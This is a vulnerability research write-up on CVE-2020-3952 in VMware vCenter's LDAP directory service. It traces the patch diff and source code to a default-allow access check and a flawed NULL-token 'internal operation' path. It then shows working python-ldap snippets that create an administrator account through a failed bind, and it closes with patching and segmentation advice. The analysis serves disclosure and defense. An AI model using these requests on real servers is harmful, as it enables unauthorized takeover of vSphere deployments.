Last Thursday, VMware published a security advisory for CVE-2020-3952, describing a “sensitive information disclosure vulnerability in the VMware Directory Service (vmdir)”. It’s a pretty terse advisory, and it doesn’t go into much more detail than that, besides stating that any vCenter Server v6.7 that has been upgraded from a previous version is vulnerable.

What’s striking about this advisory is that the vulnerability got a CVSS score of 10.0 — as high as this score can go. Despite the amount of press the advisory got, though, we couldn’t find anything written about the technical details of the vulnerability. We wanted to get a better understanding of its risks and to see how an attacker could exploit them, so we started investigating the changes in VMware’s recommended patch — vCenter Appliance 6.7 Update 3f.

By combing through the changes made to the vCenter Directory service, we reconstructed the faulty code flow that led to this vulnerability. Our analysis showed that with three simple unauthenticated LDAP commands, an attacker with nothing more than network access to the vCenter Directory Service can add an administrator account to the vCenter Directory. We were able to implement a proof of concept for this exploit that enacts a remote takeover of the entire vSphere deployment.


TL;DR


The vulnerability is enabled by two critical issues in vmdir’s legacy LDAP handling code:

  1. A bug in a function named VmDirLegacyAccessCheck which causes it to return “access granted” when permissions checks fail.
  2. A security design flaw which grants root privileges to an LDAP session with no token, under the assumption that it is an internal operation.

Looking into the patch


Since VMware releases its new versions as whole disk images rather than incremental patches, we had to diff between the previous version — Update 3e — and the new one. Mounting the disk images revealed that these releases are made up of a long list of RPMs, for the most part. Once we had extracted the contents of all of these packages, we could see which files had actually changed by comparing hashes side by side.
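The hash comparison can be sketched in a few lines of Python. This is a minimal illustration rather than the tooling we actually used: the function names and the optional `name_filter` parameter are hypothetical, and it assumes both releases have already been extracted into two directory trees.

```python
import hashlib
import os


def hash_tree(root):
    """Map each regular file's path (relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            # Skip symlinks and anything that is not a regular file.
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(full, root)] = digest
    return digests


def changed_files(old_root, new_root, name_filter=""):
    """Return sorted relative paths that differ or exist on one side only."""
    old, new = hash_tree(old_root), hash_tree(new_root)
    return sorted(
        path
        for path in set(old) | set(new)
        if old.get(path) != new.get(path) and name_filter in path
    )
```

Calling `changed_files("unpatched_extracted", "patched_extracted")` would list every differing file, and passing a `name_filter` narrows the list to paths containing that substring.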

Unfortunately, it turned out that nearly 1500 files had changed since the last release, far more than we could check by hand. We guessed that our culprit would probably have “vmdir” somewhere in its name. Sure enough, this cut down the results to a much more manageable list:



usr/lib/vmware-vmdir/lib64/libcsrp.a 
usr/lib/vmware-vmdir/lib64/libcsrp.la 
usr/lib/vmware-vmdir/lib64/libgssapi_ntlm.a 
usr/lib/vmware-vmdir/lib64/libgssapi_ntlm.la 
usr/lib/vmware-vmdir/lib64/libgssapi_srp.a 
usr/lib/vmware-vmdir/lib64/libgssapi_srp.la 
usr/lib/vmware-vmdir/lib64/libgssapi_unix.a 
usr/lib/vmware-vmdir/lib64/libgssapi_unix.la 
usr/lib/vmware-vmdir/lib64/libkrb5crypto.a 
usr/lib/vmware-vmdir/lib64/libkrb5crypto.la 
usr/lib/vmware-vmdir/lib64/libsaslvmdirdb.a 
usr/lib/vmware-vmdir/lib64/libsaslvmdirdb.la 
usr/lib/vmware-vmdir/lib64/libvmdirauth.a 
usr/lib/vmware-vmdir/lib64/libvmdirauth.la 
usr/lib/vmware-vmdir/lib64/libvmdirclient.a 
usr/lib/vmware-vmdir/lib64/libvmdirclient.la 
usr/lib/vmware-vmdir/lib64/libvmkdcserv.a 
usr/lib/vmware-vmdir/lib64/libvmkdcserv.la 
usr/lib/vmware-vmdir/sbin/vmdird  

So a list of statically linked libraries that are (presumably) built into a single compiled binary: vmdird. In other words, the vmdir server has changed since Update 3e. Looks promising!

Before doing a proper binary diff, we figured we’d see if there were any obvious changes made to exported symbols in vmdird. The results of this comparison were striking:



jj@ubuntu:~/misc/vms$ diff <(objdump -T patched_extracted/usr/lib/vmware-vmdir/sbin/vmdird | cut -f 2- -d " " | sort | uniq) <(objdump -T unpatched_extracted/usr/lib/vmware-vmdir/sbin/vmdird | cut -f 2- -d " " | sort | uniq)
1370a1371
> g    DF .text 00000000000000ce  Base        VmDirLegacyAccessCheck
1440d1440
< g    DF .text 00000000000000ef  Base        VmDirLegacyAccessCheck
2194a2195
> g    DF .text 000000000000038d  Base        VmDirSrvAccessCheck
2199d2199
< g    DF .text 0000000000000393  Base        VmDirSrvAccessCheck

Nothing like a function named VmDirLegacyAccessCheck for vulnerability research! This seems like an especially good place to start, since VMware writes that “affected deployments will create a log entry when the vmdir service starts stating that legacy ACL mode is enabled.”
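For readers who prefer a script over a shell one-liner, the symbol comparison can be approximated in Python. This is a sketch under assumptions: it takes the text of `objdump -T` as input, relies only on the last three columns (size, version, name), and the helper names are ours. Symbols that lack a version column are simply skipped.

```python
def parse_dynsym_sizes(objdump_output):
    """Map symbol name -> size, parsed from `objdump -T` text.

    Only the last three whitespace-separated columns are used, so the
    parser works whether or not the leading address column was cut away.
    """
    sizes = {}
    for line in objdump_output.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # blank lines and short headers
        try:
            size = int(fields[-3], 16)
        except ValueError:
            continue  # not a symbol line in the expected layout
        sizes[fields[-1]] = size
    return sizes


def changed_symbols(old_output, new_output):
    """Return {name: (old_size, new_size)} for symbols whose size changed."""
    old = parse_dynsym_sizes(old_output)
    new = parse_dynsym_sizes(new_output)
    return {
        name: (old[name], new[name])
        for name in sorted(old.keys() & new.keys())
        if old[name] != new[name]
    }
```

A changed size does not prove a semantic change, but it is a cheap first filter before reaching for a real binary diffing tool.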

We laid out the disassembly of these functions in IDA. Here’s the unpatched version. Pay attention to anything that can change the function’s return value.



__int64 __fastcall VmDirLegacyAccessCheck(__int64 a1, __int64 a2, __int64 a3, unsigned int a4)
{
  unsigned int v5; // [rsp+14h] [rbp-2Ch]@1
  __int64 v6; // [rsp+18h] [rbp-28h]@1
  unsigned int v7; // [rsp+3Ch] [rbp-4h]@1

  v6 = a3;
  v5 = a4;
  v7 = 0;  // VMDIR_SUCCESS
  if ( !(unsigned __int8)sub_4EF7B1(a1, a2, a4)
    && v5 == 2
    && ((unsigned __int8)sub_4EF510(v6) || (unsigned __int8)sub_4EF218(v6) || (unsigned __int8)VmDirIsSchemaEntry(v6)) )
  {
    v7 = 9114;  // VMDIR_ERROR_UNWILLING_TO_PERFORM
    VmDirLog1(4);
  }
  return v7;
}

And this is the patched one:



__int64 __fastcall VmDirLegacyAccessCheck(__int64 a1, __int64 a2, __int64 a3, unsigned int a4)
{
  unsigned int v5; // [rsp+14h] [rbp-2Ch]@1
  __int64 v6; // [rsp+18h] [rbp-28h]@1
  unsigned int v7; // [rsp+3Ch] [rbp-4h]@1

  v6 = a3;
  v5 = a4;
  v7 = 9207;  // VMDIR_ERROR_INSUFFICIENT_ACCESS
  if ( a4 == 2
    && ((unsigned __int8)sub_4EF5B1(a3) || (unsigned __int8)sub_4EF2B9(v6) || (unsigned __int8)VmDirIsSchemaEntry(v6)) )
  {
    v7 = 9114;  // VMDIR_ERROR_UNWILLING_TO_PERFORM
    VmDirLog1(4);
  }
  else if ( (unsigned __int8)sub_4EF852(a1, a2, v5) )
  {
    v7 = 0;  // VMDIR_SUCCESS
  }
  else if ( v5 == 16 && (unsigned __int8)sub_4EF220(v6) )
  {
    v7 = 0;  // VMDIR_SUCCESS
  }
  return v7;
}

In the patched version, VmDirLegacyAccessCheck returns 9207 (VMDIR_ERROR_INSUFFICIENT_ACCESS) if none of the conditions are met. Searching for this return value, which didn’t exist in the previous version of the function, led us to a GitHub project named Lightwave. As it turns out, VMware has made vmdir’s code available in its GitHub repository.


To the source code we go


We were happy to discover the source code of VmDirLegacyAccessCheck in VMware’s repository. Not only that, but the code there matches the newly patched version of the function. Looking for when this fix was introduced led us to a commit dated August 2017 (!) with the following message:


There is a bug in legacy scheme implementation that this diff address.

Test:
1. create a normal user,say testuser1, in old DB + LW 1.2 binary setup.
2. before the fix, testuser1 has more permission than desired.
3. after the fix, testuser1 can only read/write to its own entry and nothing else.


So at least one developer at VMware was aware that something was wrong here: before the fix, a user in legacy mode “has more permission than desired.”



Before the fix, the return value of VmDirLegacyAccessCheck held a success value by default. Failing the permissions check by _VmDirAllowOperationBasedOnGroupMembership left the return value unchanged at 0 (VMDIR_SUCCESS), eventually granting access to the operation.
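The difference between the two versions is easier to see as a small Python model of the decompiled control flow. This is a sketch, not VMware's code: `group_allows` stands in for the group membership check, `protected_entry` for the three entry checks, and `extra_allow` for the additional check that only exists in the patched function (its purpose is not established here). The access values 2 and 16 are the raw constants from the decompilation.

```python
VMDIR_SUCCESS = 0
VMDIR_ERROR_UNWILLING_TO_PERFORM = 9114
VMDIR_ERROR_INSUFFICIENT_ACCESS = 9207


def legacy_access_check_unpatched(group_allows, access, protected_entry):
    """Model of the unpatched flow: success unless one narrow case matches."""
    result = VMDIR_SUCCESS  # default-allow: this is the bug
    if not group_allows and access == 2 and protected_entry:
        result = VMDIR_ERROR_UNWILLING_TO_PERFORM
    return result


def legacy_access_check_patched(group_allows, access, protected_entry,
                                extra_allow=False):
    """Model of the patched flow: denied unless a check explicitly allows."""
    result = VMDIR_ERROR_INSUFFICIENT_ACCESS  # default-deny
    if access == 2 and protected_entry:
        result = VMDIR_ERROR_UNWILLING_TO_PERFORM
    elif group_allows:
        result = VMDIR_SUCCESS
    elif access == 16 and extra_allow:
        result = VMDIR_SUCCESS
    return result
```

With a failed group check on an ordinary entry, the unpatched model returns 0 while the patched one returns 9207.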

We now have a function that seems vulnerable. Let’s find out when it’s called, and how we can take advantage of it.


Obtaining a vulnerable vCenter


We only had a vCenter Server 6.7 from a clean installation and not an upgraded one from a previous release line (6.5 or 6.0). According to VMware, on vulnerable systems, you can find a certain log line under /var/log/vmware/vmdird/vmdird-syslog.log (or %ALLUSERSPROFILE%\VMWare\vCenterServer\logs\vmdird\vmdir.log on Windows):



2020-04-06T17:50:41.860526+00:00 info vmdird  t@139910871058176: ACL MODE: Legacy
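Checking a log for this marker is easy to script. The sketch below is an illustration with hypothetical helper names; it only looks for the literal string shown above, so a rotated or truncated log could produce a false negative.

```python
LEGACY_MARKER = "ACL MODE: Legacy"


def legacy_acl_log_lines(lines):
    """Return the log lines (without trailing newline) that report legacy ACL mode."""
    return [line.rstrip("\n") for line in lines if LEGACY_MARKER in line]


def log_reports_legacy_mode(path):
    """True if the log file at `path` contains the legacy ACL marker."""
    with open(path, "r", errors="replace") as fh:
        return bool(legacy_acl_log_lines(fh))
```

On an appliance, `log_reports_legacy_mode("/var/log/vmware/vmdird/vmdird-syslog.log")` would be the natural call.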

Since our vCenter Server was not vulnerable, the log file was missing this line. Looking for the code that prints this log line led us to a function named _VmDirIsLegacyACLMode:



static
BOOLEAN
_VmDirIsLegacyACLMode(
    VOID
    )
{
...

    dwError = VmDirBackendUniqKeyGetValue(
                VMDIR_KEY_BE_GENERIC_ACL_MODE,  // "acl-mode"
                &pValue);
...

    // We should have value "enabled" found for ACL enabled case.
    bIsLegacy = VmDirStringCompareA(pValue, VMDIR_ACL_MODE_ENABLED, FALSE) != 0;
...
    if (bIsLegacy)
    {
        VMDIR_LOG_INFO(VMDIR_LOG_MASK_ALL, "ACL MODE: Legacy");
    }
...
}

The code implies that there’s a key-value store somewhere that should hold the key “acl-mode” with the value “enabled” (for non-legacy mode) or “disabled” (for legacy mode). Sure enough, “acl-modeenabled” showed up a number of times in our (patched) vmdir database file, /storage/db/vmware-vmdir/data.mdb. Changing the “enabled” part of this string to anything else (“disabled” would change the string’s size, so we didn’t go with that) and restarting vmdir made the desired log line show up in vmdird-syslog.log.
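The two ideas in this step, that anything other than “enabled” counts as legacy and that the replacement must keep the same length, can be modelled as follows. This is a sketch on in-memory bytes, not a tool for editing a live database: the replacement value `xnabled` is a made-up example, and the case-insensitive comparison is our assumption about what the `FALSE` argument to VmDirStringCompareA means.

```python
VMDIR_ACL_MODE_ENABLED = "enabled"


def is_legacy_acl_mode(stored_value):
    """Legacy mode is 'any stored value other than enabled'.

    Assumption: the comparison in the C code is case-insensitive.
    """
    return stored_value.lower() != VMDIR_ACL_MODE_ENABLED


def flip_acl_mode(blob, replacement=b"xnabled"):
    """Replace the value after the 'acl-mode' key without changing the length."""
    old = b"acl-mode" + VMDIR_ACL_MODE_ENABLED.encode("ascii")
    new = b"acl-mode" + replacement
    if len(new) != len(old):
        raise ValueError("replacement must have the same length as 'enabled'")
    return blob.replace(old, new)
```

The length guard is the reason “disabled” was not an option: it is one byte longer than “enabled”.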

This explains why only upgraded vCenter Server 6.7 machines are vulnerable to this attack, and not clean installs of this version. The vmdird binary contains the same vulnerable code either way; what differs is the ACL mode configuration. Clean installations default to non-legacy mode (acl-mode is enabled), but upgrades preserve the previous configuration, where legacy mode is enabled by default.

We now have a vulnerable machine. But what is it vulnerable to?


Exploitation


At this point, we need to find out how to trigger the code flow that ends up in the vulnerable function VmDirLegacyAccessCheck.



As we can see in the call graph, add, modify, and search requests can all go through VmDirLegacyAccessCheck.


First attempts


We installed ldap-utils and tried to add a user to the vCenter machine using incorrect credentials:



root@computer:~# ldapadd -x -w 1234 -f hacker.ldif -h 192.168.1.130 -D"cn=Administrator,cn=Users,dc=vsphere,dc=local"
ldap_bind: Invalid credentials (49)

That didn’t get very far. Let’s see what the vmdird log has to say:



2020-04-15T14:20:56.079504+00:00 info vmdird  t@140564750137088: Bind failed () (9234)
2020-04-15T14:20:56.080409+00:00 err vmdird  t@140564750137088: VmDirSendLdapResult: Request (Bind), Error (49), Message (), (0) socket (192.168.0.254)
2020-04-15T14:20:56.080832+00:00 err vmdird  t@140564750137088: Bind Request Failed (192.168.0.254) error 49: Protocol version: 3, Bind DN: "cn=Administrator,cn=Users,dc=vsphere,dc=local", Method: Simple

It seems like we never actually reached the “add” part of this request. ldapadd first needs to bind to the server before it can run any commands against it, but the binding fails with error 9234 — VMDIR_ERROR_USER_INVALID_CREDENTIAL. Is there a way to skip the bind stage?

We installed python-ldap and tried doing it ourselves:



import ldap
import ldap.modlist

dn = 'cn=Hacker,cn=Users,dc=vsphere,dc=local'
# Attributes of the user entry we want to create
modlist = {
    'userPrincipalName': ['hacker@VSPHERE.LOCAL'],
    'sAMAccountName': ['hacker'],
    'givenName': ['hacker'],
    'sn': ['vsphere.local'],
    'cn': ['Hacker'],
    'uid': ['hacker'],
    'objectClass': ['top', 'person', 'organizationalPerson', 'user'],
    'userPassword': 'TheHacker1!'
}

# Send the add request without binding first
c = ldap.initialize('ldap://192.168.1.130')
c.add_s(dn, ldap.modlist.addModlist(modlist))

Traceback (most recent call last):
  File "do_ldap.py", line 27, in <module>
    print c.add_s(dn, ldap.modlist.addModlist(modlist))
...
ldap.INSUFFICIENT_ACCESS: {'info': u'Not bind/authenticate yet', 'desc': u'Insufficient access'}

Another no-go. Here’s the matching log from the vCenter server:



2020-04-15T14:32:21.526506+00:00 err vmdird  t@140565521872640: VmDirSendLdapResult: Request (Add), Error (50), Message (Not bind/authenticate yet), (0) socket (192.168.0.254)

Bind/authenticate time


Looking for the error message “Not bind/authenticate yet” inside the code leads us to the function VmDirMLAdd.



int
VmDirMLAdd(
    PVDIR_OPERATION pOperation
    )
{
    ...
    // AnonymousBind Or in case of a failed bind, do not grant add access
    if (pOperation->conn->bIsAnonymousBind || VmDirIsFailedAccessInfo(&pOperation->conn->AccessInfo))
    {
        dwError = LDAP_INSUFFICIENT_ACCESS;
        BAIL_ON_VMDIR_ERROR_WITH_MSG(
                dwError, pszLocalErrMsg,
                "Not bind/authenticate yet");
    }

    ...

    dwError = VmDirInternalAddEntry(pOperation);
    BAIL_ON_VMDIR_ERROR(dwError);
    ...
}

As the code shows, two conditions must hold in order for the client to be able to add an entry:

  1. The LDAP session must not be anonymous, namely, it has to specify a domain;
  2. The session should not have “failed access info”.

Let’s start with passing the first condition. For that, we need bIsAnonymousBind to be FALSE. The only code that sets this variable to FALSE is in VmDirMLBind:



int
VmDirMLBind(
   PVDIR_OPERATION   pOperation
   )
{
    ...
    pOperation->conn->bIsAnonymousBind = TRUE;  // default to anonymous bind

    switch (pOperation->request.bindReq.method)
    {
        case LDAP_AUTH_SIMPLE:
                  ...
                  pOperation->conn->bIsAnonymousBind = FALSE;
                  dwError = VmDirInternalBindEntry(pOperation);
                  BAIL_ON_VMDIR_ERROR(dwError);
                  ...

                break;

        case LDAP_AUTH_SASL:
                pOperation->conn->bIsAnonymousBind = FALSE;
                dwError = _VmDirSASLBind(pOperation);
                BAIL_ON_VMDIR_ERROR(dwError);
               ...
                break;

       ...
    }
    ...
}

Notice that bIsAnonymousBind is assigned FALSE whether or not VmDirInternalBindEntry succeeds. In other words, even if we fail our bind authentication, we’ll pass the first part of the condition.

Now for the second part of that condition. What does VmDirIsFailedAccessInfo do? Surprisingly, not much:



/* Check whether it is a valid accessInfo
 * (i.e.: resulted by doing a successful bind in an operation) */
BOOLEAN
VmDirIsFailedAccessInfo(
    PVDIR_ACCESS_INFO   pAccessInfo
    )
{

    BOOLEAN     bIsFaliedAccessPermission = TRUE;

    if ( ! pAccessInfo->pAccessToken )
    {   // internal operation has NULL pAccessToken, yet we granted root privilege
        bIsFaliedAccessPermission = FALSE;
    }
    else
    {   // coming from LDAP protocol, we should have BIND information
        if ( ! IsNullOrEmptyString(pAccessInfo->pszBindedObjectSid)
             &&
             ! IsNullOrEmptyString(pAccessInfo->pszNormBindedDn)
             &&
             ! IsNullOrEmptyString(pAccessInfo->pszBindedDn)
           )
        {
            bIsFaliedAccessPermission = FALSE;
        }
    }

    return bIsFaliedAccessPermission;
}

In order to reach the user addition flow, we need to make it return FALSE somehow. Let’s take a look at the first way out — checking for a NULL access token.

It seems strange that a function that checks whether to grant access would specifically allow a user without an access token. From the brief comment below the check, it looks like this case was intended for “internal operations”. Presumably an LDAP operation launched internally by vmdird would leave pAccessToken empty to mark that it should be allowed through, and any other access would fail at the bind stage earlier. This is a strange way to do this; it would be much clearer to make a designated pAccessInfo->bIsInternalOperation field for this purpose.
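The alternative suggested above, an explicit flag instead of a NULL token, might look like this in a Python model. It is a design sketch only: the `is_internal_operation` field is hypothetical (it is our rendering of the proposed bIsInternalOperation), and the remaining fields loosely mirror the ones tested in VmDirIsFailedAccessInfo.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class AccessInfo:
    access_token: Optional[object] = None
    binded_object_sid: str = ""
    norm_binded_dn: str = ""
    binded_dn: str = ""
    is_internal_operation: bool = False  # hypothetical explicit marker


def is_failed_access_info(info):
    """Fail closed: a missing token is no longer treated as 'internal'."""
    if info.is_internal_operation:
        return False  # only code that sets the flag on purpose gets through
    has_bind_info = (
        info.access_token is not None
        and bool(info.binded_object_sid)
        and bool(info.norm_binded_dn)
        and bool(info.binded_dn)
    )
    return not has_bind_info
```

Under this design, an access info that was wiped after a failed bind is reported as failed, because an empty token no longer doubles as a privilege marker.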

When binding fails, pAccessInfo->pAccessToken is left empty. Here’s VmDirInternalBindEntry, which is called by VmDirMLBind from vmdird’s message loop.



/* ...
 * Return: VmDir level error code.  Also, pOperation->ldapResult content is set.
 */
int
VmDirInternalBindEntry(
    PVDIR_OPERATION  pOperation
    )
{
    DWORD                   retVal = LDAP_SUCCESS;
    ...

    // Normalize DN
    retVal = VmDirNormalizeDN( &(pOperation->reqDn), pOperation->pSchemaCtx );
    BAIL_ON_VMDIR_ERROR_WITH_MSG( retVal, pszLocalErrMsg, "DN normalization failed - (%u)(%s)", retVal, VDIR_SAFE_STRING(VmDirSchemaCtxGetErrorMsg(pOperation->pSchemaCtx)) );

...

cleanup:

    VMDIR_SAFE_FREE_MEMORY( pszLocalErrMsg );
    VmDirFreeEntryContent ( &entry );
    return retVal;

error:
    ...
    if (retVal)
    {
        VmDirFreeAccessInfo(&pOperation->conn->AccessInfo);

        VMDIR_LOG_INFO(VMDIR_LOG_MASK_ALL,
                        "Bind failed (%s) (%u)",
                        VDIR_SAFE_STRING(pszLocalErrMsg), retVal);
        retVal = LDAP_INVALID_CREDENTIALS;
        ...
    }

    VMDIR_SET_LDAP_RESULT_ERROR(&(pOperation->ldapResult), retVal, pszLocalErrMsg);
    goto cleanup;
}

Our incorrect credentials fail all the way up at VmDirNormalizeDN. This takes us to the error flow, where VmDirFreeAccessInfo cleans out pOperation->conn->AccessInfo, including its pAccessToken.

Let’s go back to our double condition:



if (pOperation->conn->bIsAnonymousBind || 
VmDirIsFailedAccessInfo(&pOperation->conn->AccessInfo))

Both parts of the condition now evaluate to FALSE, so the check no longer stops us.

So we can’t just skip binding and expect things to work, but it does seem like even a failed bind attempt will take us through this check.
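The whole gate can be captured in a small state model. This is a simplified sketch, not the vmdir implementation: the class and function names are ours, a single boolean stands in for the three bind strings, and the initial value of `is_anonymous_bind` is an assumption chosen to match the “Not bind/authenticate yet” rejection we observed without a bind.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Connection:
    is_anonymous_bind: bool = True      # assumed initial state
    access_token: Optional[str] = None
    bind_info_complete: bool = False


def is_failed_access_info(conn):
    if conn.access_token is None:
        return False  # a NULL token is treated as an internal operation
    return not conn.bind_info_complete


def simple_bind(conn, credentials_ok):
    conn.is_anonymous_bind = False  # cleared before credentials are verified
    if credentials_ok:
        conn.access_token = "token"
        conn.bind_info_complete = True
    else:
        # Error path: the access info is freed, leaving no token behind.
        conn.access_token = None
        conn.bind_info_complete = False
    return credentials_ok


def add_passes_gate(conn):
    """Model of the check at the top of VmDirMLAdd."""
    return not (conn.is_anonymous_bind or is_failed_access_info(conn))
```

In this model a connection that never binds is rejected, while one that binds with wrong credentials passes the gate, which is exactly the asymmetry described above.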


The part where everything comes together


Where does all of this get us, though? We’re finally reaching our buggy VmDirLegacyAccessCheck. Before performing the add operation, VmDirInternalAddEntry calls VmDirSrvAccessCheck which in turn calls VmDirLegacyAccessCheck.

In theory we should have failed to reach this flow long ago; VmDirLegacyAccessCheck is the last line of defense. Its job is to check that this particular type of access — adding or modifying an LDAP entry — should be allowed by this particular user. The authentication check shouldn’t have allowed us to get here in the first place, but you would still expect this check to prevent us from moving onwards.

Remember this, though?


There is a bug in legacy scheme implementation that this diff address.

Test:
1. create a normal user,say testuser1, in old DB + LW 1.2 binary setup.
2. before the fix, testuser1 has more permission than desired.
3. after the fix, testuser1 can only read/write to its own entry and nothing else.


That looks like the last link we need in our chain. If VmDirLegacyAccessCheck always lets us through, the access check should succeed, and our user should be added.

What happens, then, if we ignore the result from bind?



c = ldap.initialize('ldap://192.168.1.130')
try:
    c.simple_bind_s(dn, 'fakepassword')
except ldap.LDAPError:
    pass  # the bind is expected to fail; ignore the error and carry on
c.add_s(dn, ldap.modlist.addModlist(modlist))

Huh. No output for this in /var/log/vmware/vmdird/vmdird-syslog.log. Can we see this user with a search request?



root@computer:~# ldapsearch -b "cn=Hacker,cn=Users,dc=vsphere,dc=local" -s sub -D "cn=Administrator,cn=Users,dc=vsphere,dc=local" -h 192.168.1.130 -x -w 
# extended LDIF
#
# LDAPv3
# base <cn=Hacker,cn=Users,dc=vsphere,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# Hacker, Users, vsphere.local
dn: cn=Hacker,cn=Users,dc=vsphere,dc=local
nTSecurityDescriptor:: ...
krbPrincipalKey:: ...
sn: vsphere.local
userPrincipalName: hacker@VSPHERE.LOCAL
cn: Hacker
givenName: hacker
uid: hacker
sAMAccountName: hacker
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

No kidding. What happens if we try to connect to vSphere with this new user?



Where does one get “permissions on any vCenter Server system connected to this client”? Let’s add our Hacker user to the Administrators group with the same unauthenticated connection:



groupModList = [(ldap.MOD_ADD, 'member', [dn])]
c.modify_s('cn=Administrators,cn=Builtin,dc=vsphere,dc=local', groupModList)

Let’s try the login again:



We’re in!


Implementation


We put together an exploitation script that runs all of these stages so you can try it yourself. Check out our GitHub repository.


Mitigation – patch and segment


The most effective way to mitigate the risk demonstrated above is to install the latest patch for the vulnerable version of vCenter Server. Alternatively, installing the latest version (7.0) will also result in a secure vSphere deployment.
We highly recommend limiting access to vCenter’s LDAP interface. In practice, this means blocking any access over the LDAP port (389) except for administrative use.
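To verify that a segmentation rule actually took effect, a plain TCP connection test from a non-administrative network segment is often enough. The helper below is a minimal sketch with a hypothetical name; it only checks whether the port accepts connections and does not speak LDAP.

```python
import socket


def ldap_port_reachable(host, port=389, timeout=3.0):
    """Return True if a TCP connection to host:port can be established."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and unreachable hosts.
        return False
```

Run from a workstation that should not have access, a result of `True` means the LDAP port is still exposed to that segment.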

If you have any questions regarding how to segment your network to avoid this attack and others, don’t hesitate to contact us.


Some thoughts


This was some rabbit hole. Despite the relative clarity of VMware’s code, it looks like quite a few missteps went into this vulnerability. The developers were at least partially aware of them, too, as we saw in the code comments and commit messages. The fix to VmDirLegacyAccessCheck is no more than a band-aid. Had VMware looked into this bug in depth, they would have found a series of issues that need to be addressed: the strange semantics of bIsAnonymousBind, the disastrous handling of pAccessToken, and, of course, the bug we started from, in VmDirLegacyAccessCheck.

Perhaps the most distressing thing, though, is the fact that the bugfix to VmDirLegacyAccessCheck was written nearly three years ago, and is only being released now. Three years is a long time for something as critical as an LDAP privilege escalation not to make it into the release schedule — especially when it turns out to be much more than a privilege escalation.

We hope this was an enjoyable read. We believe there are still quite a few research leads left open here — check out Project Lightwave. Happy hunting!